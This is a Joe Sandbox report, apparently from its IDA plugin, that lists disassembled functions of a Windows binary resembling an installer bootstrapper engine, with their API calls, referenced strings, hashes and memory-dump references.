String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: 3b04125b3dc02d4f699799766830cc6cce9bdb34877c59f44e36883131f299ef
Instruction ID: 4232b2db38d86d7a1e529be9e6a39d2063ec024a881ea04ef801a62463454b16
Opcode Fuzzy Hash: 3b04125b3dc02d4f699799766830cc6cce9bdb34877c59f44e36883131f299ef
Instruction Fuzzy Hash: 5001D672A01328ABD720AB65DC49FAB77A8EB00720F00416EF814E7281EA789E4546D1

Function 007FFD20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00000900,?,00000000,00000000,00000000,00000000,?,00000000,?,?,008003EC,?,00000000,?,?,00000001), ref: 007FFD3F
GetLastError.KERNEL32(?,008003EC,?,00000000,?,?,00000001,?,007C5523,?,?,00000000,?,?,007C528D,00000002), ref: 007FFD4B
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,008003EC,?,00000000,?,?,00000001,?,007C5523,?,?), ref: 007FFDB3

Strings

logutil.cpp, xrefs: 007FFD69

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: 73aed3c40fadbd9d85e2d7b5726a65833eab9a3b53be164078167c8b46f9ce5c
Instruction ID: 8f8e77373b4bb2a577c37d17645ac2e8ca27069d8ed3ada11cfbb2c8a67767f0
Opcode Fuzzy Hash: 73aed3c40fadbd9d85e2d7b5726a65833eab9a3b53be164078167c8b46f9ce5c
Instruction Fuzzy Hash: 98119A3270022DEADB21AF908C15EBF7B68EF54710F014029FE0196260EB348A60E6A0

Function 007E6945 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,007E68EF,00000000,00000003), ref: 007E695C
GetLastError.KERNEL32(?,007E68EF,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,007E6CE1,?), ref: 007E6966

Strings

msuuser.cpp, xrefs: 007E698A
Failed to set service start type., xrefs: 007E6994

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ChangeConfigErrorLastService
String ID: Failed to set service start type.$msuuser.cpp
API String ID: 1456623077-1628545019
Opcode ID: 40a22da6468296bc5b0f750f6143b0750d1cb502e68cb99769c655e4433c5017
Instruction ID: 93c2018c9cc9d86ff998ac19941fd25ede45e6042722aab2fa9b021d2118ea25
Opcode Fuzzy Hash: 40a22da6468296bc5b0f750f6143b0750d1cb502e68cb99769c655e4433c5017
Instruction Fuzzy Hash: 9EF0A03260433476EB1026AA5C09F877A88EF017B0F118329FD28E61D0EA25880082E5

Function 007F3BB0 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007F3CA8
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007F3CB2
UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 007F3CBF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cf820a20cb2e6ae57724a08e004223b158d1193d376eed9df915501c649a888e
Instruction ID: d891728ca4f866a941b6f72d066eeb81afd99068330427e450e72a465304ebe5
Opcode Fuzzy Hash: cf820a20cb2e6ae57724a08e004223b158d1193d376eed9df915501c649a888e
Instruction Fuzzy Hash: 6D31D37490121CABCB21DF65D88879CBBB8BF08310F5041EAE91CA7291E7349F858F54

Function 007F4812 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,007F47E8,00000000,00827CF8,0000000C,007F493F,00000000,00000002,00000000), ref: 007F4833
TerminateProcess.KERNEL32(00000000,?,007F47E8,00000000,00827CF8,0000000C,007F493F,00000000,00000002,00000000), ref: 007F483A
ExitProcess.KERNEL32 ref: 007F484C

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: acba6af1791edd073d9d2b1415d1936ddcb79434619429a23d6c2e0c2a8f3a22
Instruction ID: 202f558c3e2540daa495d249560ff983132d80d51563789c424b9b1b96079a94
Opcode Fuzzy Hash: acba6af1791edd073d9d2b1415d1936ddcb79434619429a23d6c2e0c2a8f3a22
Instruction Fuzzy Hash: 35E0993140068CAFCF516F65ED09A6A3B69FB45781F054028FA058A232CB39E982DA84

Function 007F7A87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 007F7B51

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: c849e9ebfaf66086dd245665478114a719b8009a550f2c8b67686469ef7c2ece
Instruction ID: f0cc0250d6494f9c82b0db5909d8f7c5d8eef9629cb550ae53b9634b55e6fe54
Opcode Fuzzy Hash: c849e9ebfaf66086dd245665478114a719b8009a550f2c8b67686469ef7c2ece
Instruction Fuzzy Hash: 4941297250021DABCB289FBDCC8DDBB7778EB85310F504268FA05D7280E6349E81CB60

Function 007FA3B0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb5ef6380223df80c09fbffff4406c54564286920eb9de1bd108dda9bf4439f2
Instruction ID: a24828029ad5b87a8afe31a60d0bd77789daf0dced33a7664ec5651c866120ae
Opcode Fuzzy Hash: eb5ef6380223df80c09fbffff4406c54564286920eb9de1bd108dda9bf4439f2
Instruction Fuzzy Hash: CF022BB1E00219AFDF14CFA9C8806ADB7F1FF48324F25816AD919E7385D734AA418B91

Function 0080393B Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00803AC9: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,0080396A,?), ref: 00803B3A

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0080398E
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0080399F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AllocateCheckCloseInitializeMembershipToken
String ID:
API String ID: 2114926846-0
Opcode ID: 2e24e7a6b17b25e5f72d3b64269f2d1366ee4eb284d7b67e4ad576b32ea7c07d
Instruction ID: 675c7b3b19b8f4077108da7e2eae0cb87054e68b29b48117a21314077451615b
Opcode Fuzzy Hash: 2e24e7a6b17b25e5f72d3b64269f2d1366ee4eb284d7b67e4ad576b32ea7c07d
Instruction Fuzzy Hash: 7C113C7190061AEFDB50DFA5CC85AAFBBBCFF08300F50442DA545E6181D7709A44CB95

Function 00804315 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(007E8FFA,?,000002C0,00000000,00000000), ref: 00804350
FindClose.KERNEL32(00000000), ref: 0080435C

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0c5c2a3dd91a10dd10e4f12e13965fa27a4da0b904f0d434c20fb2504bbc9b42
Instruction ID: b1568b3ada0594c9f762333abc4c6c930da4318b4c7a2038f4c30080a0101af8
Opcode Fuzzy Hash: 0c5c2a3dd91a10dd10e4f12e13965fa27a4da0b904f0d434c20fb2504bbc9b42
Instruction Fuzzy Hash: A1018671700108ABDB20EF699D8DDAAB7ACFFC5315F401165E958D7280D7345D498754

Function 007F2B21 Relevance: 2.7, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

comres.dll, xrefs: 007F2CC8, 007F2CE1, 007F2D09, 007F2D34
0, xrefs: 007F2C91

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID: 0$comres.dll
API String ID: 0-3030269839
Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction ID: 8e24c245c68df796ce68194051bb5465b07cd8e7982e1a1656877c6d3736dad9
Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction Fuzzy Hash: 305147B170464DD7DB385E68485ABBE2795EB12340F18050ADF82DB393E60DDE43D36A

Function 007FED4C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007FED47,?,?,00000008,?,?,007FE9E7,00000000), ref: 007FEF79

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ee41f8f87a6528c93e3b23b24fdc0bbd8c1e53b7ed6c8aba413dca7d4dc29182
Instruction ID: 3ace90739fecd3853123faf3c934f58a0984aea9c776b97f2b556f3e800badc6
Opcode Fuzzy Hash: ee41f8f87a6528c93e3b23b24fdc0bbd8c1e53b7ed6c8aba413dca7d4dc29182
Instruction Fuzzy Hash: C0B11A31610609DFE715CF28C48AB657BE0FF45364F258658EA99CF3A2C739E991CB40

Function 0080858F Relevance: 1.5, APIs: 1, Instructions: 23timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,?,?,?), ref: 008085A7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 3b33b92ee86e849141abae2a6fd7b7c1eba67c270f6791ed0237f5fdef6a3561
Instruction ID: 586cb843ae3076d2bd910f6b0924e5af223ca51eddcdc55edfb8edb203a54218
Opcode Fuzzy Hash: 3b33b92ee86e849141abae2a6fd7b7c1eba67c270f6791ed0237f5fdef6a3561
Instruction Fuzzy Hash: EBE0127190110DEB8F10EFA4D945CAEB7BCFF09210B504059E80197100DA30AE1987A6

Function 007EE773 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002E77F,007EDEF8), ref: 007EE778

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ccda66d46b6724e8ad0017098335bde0e16bf4c8444bfa4329509076cfad795d
Instruction ID: 639502792f5cca76a40a202650b68a120791af48319d7ad09c65249162e1dc96
Opcode Fuzzy Hash: ccda66d46b6724e8ad0017098335bde0e16bf4c8444bfa4329509076cfad795d
Instruction Fuzzy Hash:

Function 007F0662 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 160315aa08a4fc5fe403ab76e530375d70a497fa8d6026bcd7789c6f1df2cf05
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 37C1E9322091A709EF2D4A79D43413EFBA16EA17B131A535DD5B3CB3C2FE28D524D6A0

Function 007F0A97 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 42296ddd580a4f46e4f61373231e67d7a4c8ef1326ce4e145e2d0ab0bd52cb1d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 9CC1F5322051A709EF2D4A79D43413EFBB16EA27B131A176DD5B3CB3C6EE28C524D660

Function 007F022D Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: f49ce381d953ded9c59f33f840d35459281442f5f06dede98e7d6572e10d9453
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: CCC1D9322051A70AEF2D4A79D43413EFBA16E927B131A176DD5B3CB3C6EE28C524D660

Function 007EFE15 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: dbd2e03dc7ec3ab3ebef102a2b5964cdb476e27b47904e50a88ead9eb1c799da
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 6CC10B322050A709EF2D4A7AD43413EFBB16EA27B131A576DD4B3CB7C6EE28C524D560

Function 007F2D50 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8a435a63f0e07d4efe49c6e5a7fe9c5df34b7e619d21f6a5ef439234cbc359
Instruction ID: df87fbac2fa3a4ee8a6839b31b9580bc5c1bd12c716411dfccc4189c0f4ccb5d
Opcode Fuzzy Hash: ea8a435a63f0e07d4efe49c6e5a7fe9c5df34b7e619d21f6a5ef439234cbc359
Instruction Fuzzy Hash: 4561397170070DA6DA389A6888ADBFE73A4EB51700F74091AEB83DF383DA1D9D438755

Function 007CCCB6 Relevance: 86.1, APIs: 3, Strings: 46, Instructions: 366COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,comres.dll,00000000,0080CA64,?,00000000), ref: 007CCDEC

Strings

comres.dll, xrefs: 007CCDA3
feclient.dll, xrefs: 007CCE85
Catalog, xrefs: 007CCFE5
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 007CD0B2
Failed to get payload node count., xrefs: 007CCD09
download, xrefs: 007CCDDE
Failed to select payload nodes., xrefs: 007CCCE4
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 007CD0AB
Failed to hex decode @CertificateRootThumbprint., xrefs: 007CD0B9
Failed to get @Catalog., xrefs: 007CD0CE
msasn1.dll, xrefs: 007CCF1D
CertificateRootPublicKeyIdentifier, xrefs: 007CCF36
Failed to get @CertificateRootThumbprint., xrefs: 007CD0C0
LayoutOnly, xrefs: 007CCE86
Failed to get next node., xrefs: 007CD121
Failed to get @FileSize., xrefs: 007CD0A4
cabinet.dll, xrefs: 007CCF99
Failed to hex decode the Payload/@Hash., xrefs: 007CD0D5
version.dll, xrefs: 007CCF5C
Failed to get @SourcePath., xrefs: 007CD0EA
CertificateRootThumbprint, xrefs: 007CCF73
external, xrefs: 007CCE1A
Payload, xrefs: 007CCCD1
Failed to get @FilePath., xrefs: 007CD113
FileSize, xrefs: 007CCEFB
payload.cpp, xrefs: 007CCD38
Failed to get @Id., xrefs: 007CD11A
SourcePath, xrefs: 007CCEA9
Packaging, xrefs: 007CCDBF
Failed to get @Hash., xrefs: 007CD0DC
Failed to parse @FileSize., xrefs: 007CD09A
Hash, xrefs: 007CCFB0
Failed to allocate memory for payload structs., xrefs: 007CCD42
Failed to find catalog., xrefs: 007CD0C7
Invalid value for @Packaging: %ls, xrefs: 007CD0F9
Failed to get @Packaging., xrefs: 007CD10C
Failed to get @LayoutOnly., xrefs: 007CD090
Failed to to find container: %ls, xrefs: 007CD07F
FilePath, xrefs: 007CCDA4
msi.dll, xrefs: 007CCF58
DownloadUrl, xrefs: 007CCED2
embedded, xrefs: 007CCDFE
Container, xrefs: 007CCE44
Failed to get @Container., xrefs: 007CD086
wininet.dll, xrefs: 007CD007
Failed to get @DownloadUrl., xrefs: 007CD0E3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateCompareProcessString
String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$cabinet.dll$comres.dll$download$embedded$external$feclient.dll$msasn1.dll$msi.dll$payload.cpp$version.dll$wininet.dll
API String ID: 1171520630-1949177747
Opcode ID: b04b168a286900cf960885fe8cf8db8cd744e3394ef99db2b4f8b2ea38460662
Instruction ID: 77c402158de716fe2d33b867c93b5be765e696011e3e1d736b1b135802c0995f
Opcode Fuzzy Hash: b04b168a286900cf960885fe8cf8db8cd744e3394ef99db2b4f8b2ea38460662
Instruction Fuzzy Hash: 28C1E032940629FBCB719A54CC01FAEBB64FB04B20F11427DF910E66D1D77DAE419B91

Function 007CFE26 Relevance: 81.0, APIs: 1, Strings: 45, Instructions: 476registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000,?,?,?), ref: 007D0409

Strings

EngineVersion, xrefs: 007CFFEC, 007CFFF1
Failed to cache bundle from path: %ls, xrefs: 007CFE81
DisplayName, xrefs: 007D0043, 007D0056
"%ls" %ls, xrefs: 007D02ED
EstimatedSize, xrefs: 007D0385, 007D038A, 007D0399
"%ls" /uninstall /quiet, xrefs: 007D02B0
NoElevateOnModify, xrefs: 007D023F, 007D0252
BundleProviderKey, xrefs: 007CFFA9, 007CFFAE
HelpTelephone, xrefs: 007D00E8, 007D00FB
BundleVersion, xrefs: 007CFF61, 007CFF8A
